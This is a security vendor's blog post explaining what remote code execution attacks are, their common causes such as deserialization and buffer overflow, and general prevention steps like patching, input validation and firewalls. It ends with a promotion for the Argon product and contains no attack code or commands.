The Step-by-Step Guide to Preventing Remote Code Execution (RCE)

Guy Ben-Aharon
Jan 12 · 7 min read

A 2017 cyber attack affected 200,000 computers across the globe, causing damages in the hundreds of millions of dollars and it was one of the biggest remote code execution (RCE) attacks ever reported. In the attack, the hackers encrypted critical files and locked out computer owners while demanding a ransom in exchange for decrypting the files. This incident, dubbed the Wannacry ransomware attack, showed what havoc RCE attacks can wreak.

In recent weeks, Log4j, a widely used open-source Java logging library with a critical RCE vulnerability, has been leveraged in malicious attacks. It’s become such a significant threat that global behemoths such as Microsoft are issuing threat advisory and guidance for preventing the Log4j RCE.

Today, RCE is the most common attack as observed in the 2020 Global Threat Intelligence Report, with RCE comprising 15% of all attacks. Furthermore, the 2020 Vulnerability Statistics showed that RCE attacks saw a rise of 27% in Q2 2020 from just 7% in 2019.

Take a look at the below chart of different attack types in Q2 2020.

 

What is an RCE attack?

Remote Code Execution is a computer vulnerability that allows an attacker to run malicious code on your machine or server. Also known as Arbitrary Code Execution, it is difficult to detect and, hence, a high-risk vulnerability. The RCE occurs through a malicious software download, which enables attackers to exploit the vulnerability irrespective of the geographic location.

The Remote Code Execution (RCE) Attack is a cyberattack method where the attacker can access and execute commands on your device or server from anywhere in the world. It is the most dangerous type of hacking because the attacker takes absolute control of your computer, including applications and services.

The RCE attack often precedes a scanning process to explore and detect software vulnerabilities. These vulnerabilities are leveraged to intrude into and gain administrative access to your system. Once inside the computer, the attacker can easily steal confidential data, edit or delete files, perform Distributed Denial of Service (DDoS) attacks, among other things.

An RCE attack, simply speaking, exploits a pre-existing chink in the programming methodology to execute a malicious code. The most commonly abused gaps are described below.

 

2 Common Types of RCE Techniques

The two most commonly used techniques to execute RCE attacks are Web-based and System-based. Let’s take a quick look at these two categories of RCE attacks.

  1. Web-based RCE: This is a vulnerability in a web application that lets hackers into a web server and exploits system flaws to execute malicious code. It is executed through two methods:
    • GET Method: This exploitation model utilizes user request or miss-configuration of a web application. The failure in user input validation leads to GET method-based RCE attacks.
    • Post Method: This exploitation model abuses the application framework to execute malicious code remotely. The RCE attacks target poorly protected applications.
  2. System-based RCE: This vulnerability allows system intrusion through a service running on Android, Windows, and Mac systems. It injects malware into the system through methods such as a buffer overflow, SQL injection, and other open-source exploit kits.

5 Causes of RCE Attacks

1. Dynamic Code Execution

Most programming languages enable you to execute code by calling some other piece of code, ensuring a seamless and quick result. This is one of the most powerful concepts used to tackle software complexities. However, here, the dynamic code produced depends on specific client input.

Once attackers scan and detect the existence of such code, they can incorporate malicious code to sneak into your application. This could get executed on your machine and compromise security.

Since dynamic code execution is the most commonly used concept in software development, it is also a highly targeted attack vector. Under this concept, two types of classes facilitate an RCE attack:

Direct RCE Attack

In this case of dynamic code execution, the attacker is certain of embedding and executing malicious code compatible with the target system.

Indirect RCE Attack

Here, the client’s input often funnels through multiple layers, which alters the information. In some cases, the dynamic code could be an unintended and unwanted byproduct of the program. In such cases, injecting third-party code to attack your system might give hackers the expected results.

2. Deserialization

Deserialization translates complex data structures such as objects and primitive data fields into binary format to transfer them. The conversion to their original format happens once the data reaches the destination. This conversion, however, becomes a vulnerability, and attackers can design serialized code to execute a malicious program and take advantage of the deserialization process.

3. Memory Safety

An operating system generally stores the actual program code and its metadata in memory. Failure to implement memory safety could lead to hostile code accessing unauthorized parts of the memory. Exploiting this vulnerability to access such exposed memory could result in disastrous RCE attacks.

More often than not, memory safety vulnerability arises from software design flaws in any of the components like a virtual machine, compiler, operating system kernel, or libraries. For example, one of the most common software flaws that RCE attackers highly target is Buffer Overflow.

4. Buffer Overflow

In this vulnerability, a machine’s memory is corrupted to execute RCE attacks. Buffer is a memory section with limited storage capacity to house software temporarily. However, if you skip including bounds-checking measures in your program, the code overflows into an adjacent buffer overwriting the memory. This could lead to corruption of critical data and system failure. Additionally, the attackers can inject malicious code into the memory, which can be later executed.

Other types of vulnerabilities can be abused to execute an RCE attack.

5. Type Confusion

This vulnerability occurs when you forget to code type check functionality in your program. Usually, in software development, a filtering layer needs to be in place to check the type of an object when it moves between programs. If there’s no code to check the object type, an arbitrary code can be injected into the program. This way, an attacker can trick the system into executing sinister code in place of the actual program, thereby harming the machine.

Step by Step Guide to Prevent RCE Attacks

RCE attacks are complex and have the potential to cause disastrous consequences. RCE attackers don’t follow a fixed process, and with new vulnerabilities constantly showing up, it makes proofing against such attacks difficult. Nonetheless, implementing a few preventive measures can greatly reduce the chances of RCE attacks.

1. Keep Software Up-to-date

Vulnerabilities in software are a very common occurrence. But vendors release regular updates and patches to mitigate them. Therefore, keeping your software up to date and patching vulnerable programs as soon as vendors make them available will help prevent RCE attacks.

Many organizations avoid software updates and regular patching as it often leads to downtime and other functionality issues. And these issues may translate into productivity losses. However, by not updating the software, you open up your system to attackers, which could result in loss of personal data, money and reputation.

2. Plug Buffer Overflow Gaps

We discussed earlier how buffer overflow lets malicious parties take advantage of the vulnerability. But this gap can be plugged with a fairly easy step. All you need to do is add a canary value – typically a known but random integer – to detect buffer overflow. By checking the canary value you can identify anytime memory is overwritten and take necessary action.

3. Verify User Input Validation

User inputs give attackers an easy way into your systems, so it is wise to distrust any user inputs. You must validate user input before adding it to your program. You can do that by implementing a verification mechanism to check if the user-generated input fits your pre-defined criteria such as format and length.

4. Install a Firewall

Installing a Website Application Firewall (WAF) will prove a worthy investment as it prevents automated RCE attacks. It is similar to the firewall you install on your personal computer.

5. Use Access Control Lists

By effectively using Access Control Lists (ACL), you can limit the user’s access, thereby limiting the attacker’s reach within your system even if there is a security breach. Therefore, it is crucial to put in the time and effort to configure ACLs properly for your organization.

6. Leverage Detection Software

As an extra layer of security, it is best to invest in third-party detection software. These tools scan traffic to your properties for suspicious activities or entrants. In case of any threat detection, it blocks the suspicious host, stopping a potential attack in its early stages.

Numerous threat detection software are available today – as both proprietary and open-source software, such as Argon.

Protecting Your Web Apps from RCE Attacks with Argon

Argon is an industry-first holistic security software that addresses multiple threat vectors that affect the supply chain. It is lightweight and comes with flexible deployment options. The software is application-aware, which means it monitors traffic to your web network and detects applications. Argon also supports multithreading, service identification, and a more straightforward rule language.

Argon can add significant value to your organization by preventing RCE attacks by enabling security, usability, and efficiency.

Guy Ben-Aharon
Jan 12 · 7 min read

Related Articles

6 Steps to Comprehensive DevOps Security

DevOps has evolved into a standard practice of software development. According to…

Eylam Milner
Apr 18 · 9 min read

What is Broken Authentication and How Can You Prevent it

Logging in to websites to access your accounts isn’t as secure as…

Eilon Elhadad
Apr 11 · 10 min read

Best practices for Improving Software Integrity

Today’s businesses and enterprises are heavily dependent on software and applications for…

Eilon Elhadad
Mar 31 · 5 min read

End-to-End CI/CD Security Platform

open source vulnerability scanner
Our next, exciting chapter. Argon is now an Aqua company
Our next, exciting chapter. Argon is now an Aqua company